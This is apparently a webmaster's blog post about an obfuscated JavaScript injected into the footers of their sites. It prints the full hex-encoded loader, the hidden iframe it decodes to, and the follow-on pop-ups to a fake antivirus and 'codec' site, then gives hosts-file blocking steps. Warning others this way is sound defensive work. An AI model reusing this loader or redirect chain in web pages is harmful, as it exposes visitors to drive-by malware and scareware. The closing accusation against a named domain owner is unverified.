Recently I noticed something else than google analytics loading in the status bar when I visited some of my sites, so I thought I`ll have a closer look.
Three of my sites had hidden links added in the footer and two of them had a piece of JavaScript.
Of course, I removed the links without thinking, but I did save thescript.
Here is how the script looks:
<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
</script><
<!-- ~ -->
Here is what the script does:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is the iframe content:
<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>
Probably a trojan of some knind, didn`t feel like looking any further.
Interesting thing is how that code got on my websites. I`m sure my account was not hacked, if it was so, all my sites would have been messed with, so I`m guessing it was the server that got hacked. What people would do for a few extra links and traffic.
So make sure you look in the source of your websites and if you find that piece of JavaScript at the end, just remove it.
As for the surfers, I guess you should block that site so you won`t get infected with who knows what.
Easyest way to do that is to edit your hosts file.
Where to find hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC
Win 98/ME = C:\WINDOWS
How hosts file contents look like:
127.0.0.1 localhost
Edit and add the unvanted site:
127.0.0.1 tumultuosum.com
How it should look now:
127.0.0.1 localhost
127.0.0.1 tumultuosum.com
So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he`s just a big fat jerk and a lousy hacker.
